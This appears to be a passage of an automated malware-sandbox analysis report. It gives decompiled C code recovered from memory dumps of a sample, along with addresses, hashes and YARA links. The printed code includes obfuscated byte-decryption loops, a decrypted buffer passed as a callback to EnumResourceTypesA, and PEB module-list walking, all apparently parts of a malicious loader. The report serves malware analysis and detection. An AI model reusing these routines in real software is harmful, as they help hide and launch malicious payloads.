					_v5 = _v5 & 0x000000ff ^ 0x0000004e;
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) - 0x62;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) + 0x2b;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) >> 0x00000006 | (_v5 & 0x000000ff) << 0x00000002;
					_v5 = (_v5 & 0x000000ff) - 0x99;
					_v5 = (_v5 & 0x000000ff) >> 0x00000007 | (_v5 & 0x000000ff) << 0x00000001;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) + 5;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 = _v5 & 0x000000ff ^ 0x00000020;
					_v5 = (_v5 & 0x000000ff) + 0xea;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - 0xae;
					_v5 = _v5 & 0x000000ff ^ 0x000000f0;
					_v5 = (_v5 & 0x000000ff) >> 0x00000005 | (_v5 & 0x000000ff) << 0x00000003;
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 = _v5 & 0x000000ff ^ 0x000000bb;
					_v5 = (_v5 & 0x000000ff) + 0x9f;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) >> 0x00000002 | (_v5 & 0x000000ff) << 0x00000006;
					_v5 = (_v5 & 0x000000ff) - 0x67;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - 0xbe;
					_v5 = _v5 & 0x000000ff ^ 0x0000001d;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) + 0x11;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) >> 0x00000002 | (_v5 & 0x000000ff) << 0x00000006;
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = _v5 & 0x000000ff ^ 0x000000a0;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 = _v5 & 0x000000ff ^ 0x000000a8;
					_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
					_v5 = _v5 & 0x000000ff ^ 0x000000aa;
					 *((char*)(_a4 + _v12)) = _v5;
					_v12 = _v12 + 1;
				}
				return _a4;
			}

0x6fd8ba6f
0x6fd8ba73
0x6fd8ba80
0x6fd8ba94
0x6fd8baa0
0x6fd8baac
0x6fd8bab5
0x6fd8babf
0x6fd8bac9
0x6fd8badc
0x6fd8bae8
0x6fd8baf1
0x6fd8bafb
0x6fd8bb04
0x6fd8bb0e
0x6fd8bb17
0x6fd8bb23
0x6fd8bb35
0x6fd8bb3e
0x6fd8bb48
0x6fd8bb52
0x6fd8bb5c
0x6fd8bb66
0x6fd8bb70
0x6fd8bb7c
0x6fd8bb88
0x6fd8bb92
0x6fd8bb9e
0x6fd8bba8
0x6fd8bbb2
0x6fd8bbbb
0x6fd8bbc5
0x6fd8bbcf
0x6fd8bbd8
0x6fd8bbe2
0x6fd8bbeb
0x6fd8bbfd
0x6fd8bc06
0x6fd8bc19
0x6fd8bc25
0x6fd8bc37
0x6fd8bc41
0x6fd8bc4b
0x6fd8bc55
0x6fd8bc5f
0x6fd8bc69
0x6fd8bc73
0x6fd8bc7d
0x6fd8bc89
0x6fd8bc92
0x6fd8bc9e
0x6fd8bcaa
0x6fd8bcbd
0x6fd8bcc7
0x6fd8bcd3
0x6fd8bcdf
0x6fd8bce8
0x6fd8bcf2
0x6fd8bd05
0x6fd8bd0f
0x6fd8bd18
0x6fd8bd22
0x6fd8bd2b
0x6fd8bd3e
0x6fd8bd47
0x6fd8bd53
0x6fd8bd5d
0x6fd8bd66
0x6fd8bd70
0x6fd8bd79
0x6fd8bd8c
0x6fd8bd96
0x6fd8bd9f
0x6fd8bda9
0x6fd8bdb2
0x6fd8bdbe
0x6fd8bdc7
0x6fd8bdd1
0x6fd8bddd
0x6fd8bdef
0x6fd8bdfb
0x6fd8be07
0x6fd8ba7d
0x6fd8ba7d
0x6fd8be14

Memory Dump Source

Source File: 00000001.00000002.674476668.000000006FD8B000.00000040.00020000.sdmp, Offset: 6FD80000, based on PE: true

Associated: 00000001.00000002.674409243.000000006FD80000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.674416889.000000006FD81000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.674432507.000000006FD89000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.674450695.000000006FD8A000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.674530569.000000006FD8D000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.674578918.000000006FD8E000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6f3dd154aedb75dfadb14a23a7a073ca75c6c10e9af638ae63b680658097f22
Instruction ID: f31a70972e2c24912249f02bc71e0f2dcbf3bf1bd24b433786926abd96421529
Opcode Fuzzy Hash: a6f3dd154aedb75dfadb14a23a7a073ca75c6c10e9af638ae63b680658097f22
Instruction Fuzzy Hash: EFD1251085D2EDADDB06CBF944603FDBFB04E26102F4845DAE0E5E6283C53A938EDB21

Uniqueness

Uniqueness Score: -1.00%

Function 6FD8BA79, Relevance: .3, Instructions: 276
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E6FD8BA79() {
				void* _t388;

				L0:
				while(1) {
					L0:
					 *(_t388 - 8) =  *(_t388 - 8) + 1;
					L1:
					if( *(_t388 - 8) <  *((intOrPtr*)(_t388 + 0xc))) {
						L2:
						 *(_t388 - 1) =  *((intOrPtr*)( *((intOrPtr*)(_t388 + 8)) +  *(_t388 - 8)));
						 *(_t388 - 1) =  *(_t388 - 1) & 0x000000ff ^ 0x000000e7;
						 *(_t388 - 1) = ( *(_t388 - 1) & 0x000000ff) - 0xb8;
						 *(_t388 - 1) =  !( *(_t388 - 1) & 0x000000ff);
						 *(_t388 - 1) =  *(_t388 - 1) & 0x000000ff ^  *(_t388 - 8);
						 *(_t388 - 1) = ( *(_t388 - 1) & 0x000000ff) - 0x3b;
						 *(_t388 - 1) = ( *(_t388 - 1) & 0x000000ff) >> 0x00000002 | ( *(_t388 - 1) & 0x000000ff) << 0x00000006;
						 *(_t388 - 1) = ( *(_t388 - 1) & 0x000000ff) - 0xf3;
						 *(_t388 - 1) =  !( *(_t388 - 1) & 0x000000ff);
						 *(_t388 - 1) =  *(_t388 - 1) & 0x000000ff ^ 0x0000005f;
						 *(_t388 - 1) =  ~( *(_t388 - 1) & 0x000000ff);
						 *(_t388 - 1) =  *(_t388 - 1) & 0x000000ff ^  *(_t388 - 8);
						 *(_t388 - 1) =  ~( *(_t388 - 1) & 0x000000ff);
						 *(_t388 - 1) = ( *(_t388 - 1) & 0x000000ff) + 0xf3;
						 *(_t388 - 1) = ( *(_t388 - 1) & 0x000000ff) >> 0x00000001 | ( *(_t388 - 1) & 0x000000ff) << 0x00000007;
						 *(_t388 - 1) =  ~( *(_t388 - 1) & 0x000000ff);
						 *(_t388 - 1) = ( *(_t388 - 1) & 0x000000ff) -  *(_t388 - 8);
						 *(_t388 - 1) =  *(_t388 - 1) & 0x000000ff ^ 0x0000001c;
						 *(_t388 - 1) = ( *(_t388 - 1) & 0x000000ff) +  *(_t388 - 8);
						 *(_t388 - 1) =  *(_t388 - 1) & 0x000000ff ^ 0x0000000b;
						 *(_t388 - 1) = ( *(_t388 - 1) & 0x000000ff) +  *(_t388 - 8);
						 *(_t388 - 1) =  *(_t388 - 1) & 0x000000ff ^ 0x000000d3;
						 *(_t388 - 1) = ( *(_t388 - 1) & 0x000000ff) - 0xc5;
						 *(_t388 - 1) =  *(_t388 - 1) & 0x000000ff ^ 0x0000006b;
						 *(_t388 - 1) = ( *(_t388 - 1) & 0x000000ff) + 0xb0;
						 *(_t388 - 1) =  *(_t388 - 1) & 0x000000ff ^ 0x0000004e;
						 *(_t388 - 1) = ( *(_t388 - 1) & 0x000000ff) +  *(_t388 - 8);
						 *(_t388 - 1) =  !( *(_t388 - 1) & 0x000000ff);
						 *(_t388 - 1) =  *(_t388 - 1) & 0x000000ff ^  *(_t388 - 8);
						 *(_t388 - 1) = ( *(_t388 - 1) & 0x000000ff) - 0x62;
						 *(_t388 - 1) =  !( *(_t388 - 1) & 0x000000ff);
						 *(_t388 - 1) = ( *(_t388 - 1) & 0x000000ff) + 0x2b;
						 *(_t388 - 1) =  !( *(_t388 - 1) & 0x000000ff);
						 *(_t388 - 1) = ( *(_t388 - 1) & 0x000000ff) >> 0x00000001 | ( *(_t388 - 1) & 0x000000ff) << 0x00000007;
						 *(_t388 - 1) =  ~( *(_t388 - 1) & 0x000000ff);
						 *(_t388 - 1) = ( *(_t388 - 1) & 0x000000ff) >> 0x00000006 | ( *(_t388 - 1) & 0x000000ff) << 0x00000002;
						 *(_t388 - 1) = ( *(_t388 - 1) & 0x000000ff) - 0x99;
						 *(_t388 - 1) = ( *(_t388 - 1) & 0x000000ff) >> 0x00000007 | ( *(_t388 - 1) & 0x000000ff) << 0x00000001;
						 *(_t388 - 1) =  *(_t388 - 1) & 0x000000ff ^  *(_t388 - 8);
						 *(_t388 - 1) = ( *(_t388 - 1) & 0x000000ff) + 5;
						 *(_t388 - 1) =  *(_t388 - 1) & 0x000000ff ^  *(_t388 - 8);
						 *(_t388 - 1) = ( *(_t388 - 1) & 0x000000ff) -  *(_t388 - 8);
						 *(_t388 - 1) =  *(_t388 - 1) & 0x000000ff ^  *(_t388 - 8);
						 *(_t388 - 1) = ( *(_t388 - 1) & 0x000000ff) -  *(_t388 - 8);
						 *(_t388 - 1) =  *(_t388 - 1) & 0x000000ff ^ 0x00000020;
						 *(_t388 - 1) = ( *(_t388 - 1) & 0x000000ff) + 0xea;
						 *(_t388 - 1) =  ~( *(_t388 - 1) & 0x000000ff);
						 *(_t388 - 1) = ( *(_t388 - 1) & 0x000000ff) - 0xae;
						 *(_t388 - 1) =  *(_t388 - 1) & 0x000000ff ^ 0x000000f0;
						 *(_t388 - 1) = ( *(_t388 - 1) & 0x000000ff) >> 0x00000005 | ( *(_t388 - 1) & 0x000000ff) << 0x00000003;
						 *(_t388 - 1) = ( *(_t388 - 1) & 0x000000ff) -  *(_t388 - 8);
						 *(_t388 - 1) =  *(_t388 - 1) & 0x000000ff ^ 0x000000bb;
						 *(_t388 - 1) = ( *(_t388 - 1) & 0x000000ff) + 0x9f;
						 *(_t388 - 1) =  !( *(_t388 - 1) & 0x000000ff);
						 *(_t388 - 1) =  *(_t388 - 1) & 0x000000ff ^  *(_t388 - 8);
						 *(_t388 - 1) = ( *(_t388 - 1) & 0x000000ff) >> 0x00000002 | ( *(_t388 - 1) & 0x000000ff) << 0x00000006;
						 *(_t388 - 1) = ( *(_t388 - 1) & 0x000000ff) - 0x67;
						 *(_t388 - 1) =  ~( *(_t388 - 1) & 0x000000ff);
						 *(_t388 - 1) = ( *(_t388 - 1) & 0x000000ff) -  *(_t388 - 8);
						 *(_t388 - 1) =  ~( *(_t388 - 1) & 0x000000ff);
						 *(_t388 - 1) = ( *(_t388 - 1) & 0x000000ff) >> 0x00000003 | ( *(_t388 - 1) & 0x000000ff) << 0x00000005;
						 *(_t388 - 1) =  ~( *(_t388 - 1) & 0x000000ff);
						 *(_t388 - 1) = ( *(_t388 - 1) & 0x000000ff) - 0xbe;
						 *(_t388 - 1) =  *(_t388 - 1) & 0x000000ff ^ 0x0000001d;
						 *(_t388 - 1) =  !( *(_t388 - 1) & 0x000000ff);
						 *(_t388 - 1) = ( *(_t388 - 1) & 0x000000ff) + 0x11;
						 *(_t388 - 1) =  ~( *(_t388 - 1) & 0x000000ff);
						 *(_t388 - 1) = ( *(_t388 - 1) & 0x000000ff) >> 0x00000002 | ( *(_t388 - 1) & 0x000000ff) << 0x00000006;
						 *(_t388 - 1) = ( *(_t388 - 1) & 0x000000ff) +  *(_t388 - 8);
						 *(_t388 - 1) =  !( *(_t388 - 1) & 0x000000ff);
						 *(_t388 - 1) = ( *(_t388 - 1) & 0x000000ff) +  *(_t388 - 8);
						 *(_t388 - 1) =  !( *(_t388 - 1) & 0x000000ff);
						 *(_t388 - 1) =  *(_t388 - 1) & 0x000000ff ^ 0x000000a0;
						 *(_t388 - 1) =  !( *(_t388 - 1) & 0x000000ff);
						 *(_t388 - 1) = ( *(_t388 - 1) & 0x000000ff) -  *(_t388 - 8);
						 *(_t388 - 1) =  *(_t388 - 1) & 0x000000ff ^ 0x000000a8;
						 *(_t388 - 1) = ( *(_t388 - 1) & 0x000000ff) >> 0x00000001 | ( *(_t388 - 1) & 0x000000ff) << 0x00000007;
						 *(_t388 - 1) =  *(_t388 - 1) & 0x000000ff ^ 0x000000aa;
						 *((char*)( *((intOrPtr*)(_t388 + 8)) +  *(_t388 - 8))) =  *(_t388 - 1);
						continue;
					}
					L3:
					return  *((intOrPtr*)(_t388 + 8));
					L4:
				}
			}

0x6fd8ba79
0x6fd8ba79
0x6fd8ba79
0x6fd8ba7d
0x6fd8ba80
0x6fd8ba86
0x6fd8ba8c
0x6fd8ba94
0x6fd8baa0
0x6fd8baac
0x6fd8bab5
0x6fd8babf
0x6fd8bac9
0x6fd8badc
0x6fd8bae8
0x6fd8baf1
0x6fd8bafb
0x6fd8bb04
0x6fd8bb0e
0x6fd8bb17
0x6fd8bb23
0x6fd8bb35
0x6fd8bb3e
0x6fd8bb48
0x6fd8bb52
0x6fd8bb5c
0x6fd8bb66
0x6fd8bb70
0x6fd8bb7c
0x6fd8bb88
0x6fd8bb92
0x6fd8bb9e
0x6fd8bba8
0x6fd8bbb2
0x6fd8bbbb
0x6fd8bbc5
0x6fd8bbcf
0x6fd8bbd8
0x6fd8bbe2
0x6fd8bbeb
0x6fd8bbfd
0x6fd8bc06
0x6fd8bc19
0x6fd8bc25
0x6fd8bc37
0x6fd8bc41
0x6fd8bc4b
0x6fd8bc55
0x6fd8bc5f
0x6fd8bc69
0x6fd8bc73
0x6fd8bc7d
0x6fd8bc89
0x6fd8bc92
0x6fd8bc9e
0x6fd8bcaa
0x6fd8bcbd
0x6fd8bcc7
0x6fd8bcd3
0x6fd8bcdf
0x6fd8bce8
0x6fd8bcf2
0x6fd8bd05
0x6fd8bd0f
0x6fd8bd18
0x6fd8bd22
0x6fd8bd2b
0x6fd8bd3e
0x6fd8bd47
0x6fd8bd53
0x6fd8bd5d
0x6fd8bd66
0x6fd8bd70
0x6fd8bd79
0x6fd8bd8c
0x6fd8bd96
0x6fd8bd9f
0x6fd8bda9
0x6fd8bdb2
0x6fd8bdbe
0x6fd8bdc7
0x6fd8bdd1
0x6fd8bddd
0x6fd8bdef
0x6fd8bdfb
0x6fd8be07
0x00000000
0x6fd8be07
0x6fd8be0e
0x6fd8be14
0x00000000
0x6fd8be14

Memory Dump Source

Source File: 00000001.00000002.674476668.000000006FD8B000.00000040.00020000.sdmp, Offset: 6FD80000, based on PE: true

Associated: 00000001.00000002.674409243.000000006FD80000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.674416889.000000006FD81000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.674432507.000000006FD89000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.674450695.000000006FD8A000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.674530569.000000006FD8D000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.674578918.000000006FD8E000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26a10e0dea0752523edc6665b4ee71d0f3418444074abc2de296944c70f0d34b
Instruction ID: cdda6195095d1695bcec0ba7eebaf1ffcddbe32dafd268e126b5a943ea773bf2
Opcode Fuzzy Hash: 26a10e0dea0752523edc6665b4ee71d0f3418444074abc2de296944c70f0d34b
Instruction Fuzzy Hash: 91D1165485D2EDADDB06CBF945603FDBFB04E26102F4845DAE0E5E6283C53A938EDB21

Uniqueness

Uniqueness Score: -1.00%

Function 6FD8754F, Relevance: .1, Instructions: 144
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E6FD8754F() {
				int _t103;
				void* _t202;

				L0:
				while(1) {
					L0:
					 *(_t202 - 8) =  *(_t202 - 8) + 1;
					L1:
					if( *(_t202 - 8) < 0x1399) {
						L2:
						_t5 = E6FD8B070 +  *(_t202 - 8); // 0x25000000
						 *(_t202 - 1) =  *_t5;
						 *(_t202 - 1) = ( *(_t202 - 1) & 0x000000ff) >> 0x00000007 | ( *(_t202 - 1) & 0x000000ff) << 0x00000001;
						 *(_t202 - 1) =  *(_t202 - 1) & 0x000000ff ^ 0x000000b9;
						 *(_t202 - 1) =  ~( *(_t202 - 1) & 0x000000ff);
						 *(_t202 - 1) =  *(_t202 - 1) & 0x000000ff ^ 0x0000002f;
						 *(_t202 - 1) =  ~( *(_t202 - 1) & 0x000000ff);
						 *(_t202 - 1) = ( *(_t202 - 1) & 0x000000ff) - 0x9a;
						 *(_t202 - 1) =  *(_t202 - 1) & 0x000000ff ^  *(_t202 - 8);
						 *(_t202 - 1) =  !( *(_t202 - 1) & 0x000000ff);
						 *(_t202 - 1) = ( *(_t202 - 1) & 0x000000ff) -  *(_t202 - 8);
						 *(_t202 - 1) =  ~( *(_t202 - 1) & 0x000000ff);
						 *(_t202 - 1) =  *(_t202 - 1) & 0x000000ff ^ 0x00000061;
						 *(_t202 - 1) = ( *(_t202 - 1) & 0x000000ff) +  *(_t202 - 8);
						 *(_t202 - 1) =  ~( *(_t202 - 1) & 0x000000ff);
						 *(_t202 - 1) = ( *(_t202 - 1) & 0x000000ff) - 0x4c;
						 *(_t202 - 1) = ( *(_t202 - 1) & 0x000000ff) >> 0x00000005 | ( *(_t202 - 1) & 0x000000ff) << 0x00000003;
						 *(_t202 - 1) = ( *(_t202 - 1) & 0x000000ff) - 0x74;
						 *(_t202 - 1) =  *(_t202 - 1) & 0x000000ff ^  *(_t202 - 8);
						 *(_t202 - 1) =  !( *(_t202 - 1) & 0x000000ff);
						 *(_t202 - 1) = ( *(_t202 - 1) & 0x000000ff) + 0xed;
						 *(_t202 - 1) = ( *(_t202 - 1) & 0x000000ff) >> 0x00000006 | ( *(_t202 - 1) & 0x000000ff) << 0x00000002;
						 *(_t202 - 1) =  *(_t202 - 1) & 0x000000ff ^ 0x00000089;
						 *(_t202 - 1) = ( *(_t202 - 1) & 0x000000ff) + 0xf8;
						 *(_t202 - 1) =  !( *(_t202 - 1) & 0x000000ff);
						 *(_t202 - 1) = ( *(_t202 - 1) & 0x000000ff) + 0xfc;
						 *(_t202 - 1) =  *(_t202 - 1) & 0x000000ff ^ 0x000000f9;
						 *(_t202 - 1) = ( *(_t202 - 1) & 0x000000ff) - 0x85;
						 *(_t202 - 1) =  ~( *(_t202 - 1) & 0x000000ff);
						 *(_t202 - 1) = ( *(_t202 - 1) & 0x000000ff) + 0x19;
						 *(_t202 - 1) =  *(_t202 - 1) & 0x000000ff ^  *(_t202 - 8);
						 *(_t202 - 1) = ( *(_t202 - 1) & 0x000000ff) -  *(_t202 - 8);
						 *(_t202 - 1) =  *(_t202 - 1) & 0x000000ff ^ 0x0000007b;
						 *(_t202 - 1) = ( *(_t202 - 1) & 0x000000ff) -  *(_t202 - 8);
						 *(_t202 - 1) =  !( *(_t202 - 1) & 0x000000ff);
						 *(_t202 - 1) =  *(_t202 - 1) & 0x000000ff ^  *(_t202 - 8);
						 *(_t202 - 1) =  !( *(_t202 - 1) & 0x000000ff);
						 *(_t202 - 1) =  *(_t202 - 1) & 0x000000ff ^ 0x0000009d;
						 *(_t202 - 1) = ( *(_t202 - 1) & 0x000000ff) - 0xa8;
						 *(_t202 - 1) = ( *(_t202 - 1) & 0x000000ff) >> 0x00000007 | ( *(_t202 - 1) & 0x000000ff) << 0x00000001;
						 *(_t202 - 1) = ( *(_t202 - 1) & 0x000000ff) -  *(_t202 - 8);
						 *(_t202 - 1) =  *(_t202 - 1) & 0x000000ff ^ 0x000000ee;
						 *((char*)(E6FD8B070 +  *(_t202 - 8))) =  *(_t202 - 1);
						continue;
					}
					L3:
					_t103 = EnumResourceTypesA(0, E6FD8B070, 0); // executed
					L4:
					return _t103;
					L5:
				}
			}

0x6fd8754f
0x6fd8754f
0x6fd8754f
0x6fd87555
0x6fd87558
0x6fd8755f
0x6fd87565
0x6fd87568
0x6fd8756e
0x6fd87580
0x6fd8758c
0x6fd87595
0x6fd8759f
0x6fd875a8
0x6fd875b5
0x6fd875bf
0x6fd875c8
0x6fd875d2
0x6fd875db
0x6fd875e5
0x6fd875ef
0x6fd875f8
0x6fd87602
0x6fd87615
0x6fd8761f
0x6fd87629
0x6fd87632
0x6fd8763e
0x6fd87651
0x6fd8765d
0x6fd8766a
0x6fd87673
0x6fd8767f
0x6fd8768c
0x6fd87699
0x6fd876a2
0x6fd876ac
0x6fd876b6
0x6fd876c0
0x6fd876ca
0x6fd876d4
0x6fd876dd
0x6fd876e7
0x6fd876f0
0x6fd876fc
0x6fd87709
0x6fd8771b
0x6fd87725
0x6fd87732
0x6fd8773b
0x00000000
0x6fd8773b
0x6fd87746
0x6fd8774f
0x6fd87755
0x6fd87758
0x00000000
0x6fd87758

APIs

EnumResourceTypesA.KERNEL32(00000000,6FD8B070,00000000), ref: 6FD8774F

Memory Dump Source

Source File: 00000001.00000002.674416889.000000006FD81000.00000020.00020000.sdmp, Offset: 6FD80000, based on PE: true

Associated: 00000001.00000002.674409243.000000006FD80000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.674432507.000000006FD89000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.674450695.000000006FD8A000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.674476668.000000006FD8B000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.674530569.000000006FD8D000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.674578918.000000006FD8E000.00000002.00020000.sdmp Download File

Similarity

API ID: EnumResourceTypes
String ID:
API String ID: 29811550-0
Opcode ID: 5ef4adad5e47a2141cd259277ccc643b01744a4fb8fb68a411fe91886c349e27
Instruction ID: cf0a9b2f43c4552f0f22c241d851df6d2d4fcd83dcbe53d9a7302c24ab7e802b
Opcode Fuzzy Hash: 5ef4adad5e47a2141cd259277ccc643b01744a4fb8fb68a411fe91886c349e27
Instruction Fuzzy Hash: A761435484D2E8A9DF06C7FA51A03FCFFB15E6B102F0885DAD0E166287D43A538EDB21

Uniqueness

Uniqueness Score: -1.00%

Function 6FD8B686, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.674476668.000000006FD8B000.00000040.00020000.sdmp, Offset: 6FD80000, based on PE: true

Associated: 00000001.00000002.674409243.000000006FD80000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.674416889.000000006FD81000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.674432507.000000006FD89000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.674450695.000000006FD8A000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.674530569.000000006FD8D000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.674578918.000000006FD8E000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33a51492acd799fda5257bf088777f214ccb1d9f9f441b58e2bbc693c92cdb2e
Instruction ID: 43bb5789138634e166ea4b72f19f63809f78809975877e9113ba43a9e1412c44
Opcode Fuzzy Hash: 33a51492acd799fda5257bf088777f214ccb1d9f9f441b58e2bbc693c92cdb2e
Instruction Fuzzy Hash: 7E11C271A00308EFDB509FAAC8888AEF7FDEF45690B5040A6E865D7394E770FE41C660

Uniqueness

Uniqueness Score: -1.00%

Function 6FD8B776, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.674476668.000000006FD8B000.00000040.00020000.sdmp, Offset: 6FD80000, based on PE: true

Associated: 00000001.00000002.674409243.000000006FD80000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.674416889.000000006FD81000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.674432507.000000006FD89000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.674450695.000000006FD8A000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.674530569.000000006FD8D000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.674578918.000000006FD8E000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc1e897972a7d9dc8875f39a415db8f1ab4cad54cee1718619e07451133396d9
Instruction ID: ee7562e5d2fd5eee04c2fa30347755a4232f11cfaf3a376f0691b9921741e19c
Opcode Fuzzy Hash: bc1e897972a7d9dc8875f39a415db8f1ab4cad54cee1718619e07451133396d9
Instruction Fuzzy Hash: 56E0E5397647099F8B84CBA8CD81D59B3E8EB19620B114295E925C73E0EA34FE009B50

Uniqueness

Uniqueness Score: -1.00%

Function 6FD8B7B4, Relevance: .0, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6FD8B7B4(void* __ecx, void* __eflags) {
				void* _t10;
				intOrPtr* _t14;
				intOrPtr* _t15;

				_t10 = __ecx;
				_t14 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc));
				_t15 = _t14;
				while(E6FD8B686( *((intOrPtr*)(_t15 + 0x30)), _t10) != 0) {
					_t15 =  *_t15;
					if(_t15 != _t14) {
						continue;
					}
					return 0;
				}
				return  *((intOrPtr*)(_t15 + 0x28));
			}

0x6fd8b7c0
0x6fd8b7c2
0x6fd8b7c5
0x6fd8b7c7
0x6fd8b7d5
0x6fd8b7d9
0x00000000
0x00000000
0x00000000
0x6fd8b7db
0x00000000

Memory Dump Source

Source File: 00000001.00000002.674476668.000000006FD8B000.00000040.00020000.sdmp, Offset: 6FD80000, based on PE: true

Associated: 00000001.00000002.674409243.000000006FD80000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.674416889.000000006FD81000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.674432507.000000006FD89000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.674450695.000000006FD8A000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.674530569.000000006FD8D000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.674578918.000000006FD8E000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
Instruction ID: f55c570f2b479f1a4132798bdf290efa29cabccbeb1f996cf30d93672c2817aa
Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
Instruction Fuzzy Hash: E7E08636310710DBC390DB19C980852F3E9FF886B0719486AE8A5D7760C730FC00C650

Uniqueness

Uniqueness Score: -1.00%

Function 6FD8B737, Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6FD8B737() {

				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
			}

0x6fd8b74a

Memory Dump Source

Source File: 00000001.00000002.674476668.000000006FD8B000.00000040.00020000.sdmp, Offset: 6FD80000, based on PE: true

Associated: 00000001.00000002.674409243.000000006FD80000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.674416889.000000006FD81000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.674432507.000000006FD89000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.674450695.000000006FD8A000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.674530569.000000006FD8D000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.674578918.000000006FD8E000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40

Uniqueness

Uniqueness Score: -1.00%

Function 00403FCB, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00403FCB(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				intOrPtr _t71;
				intOrPtr _t85;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
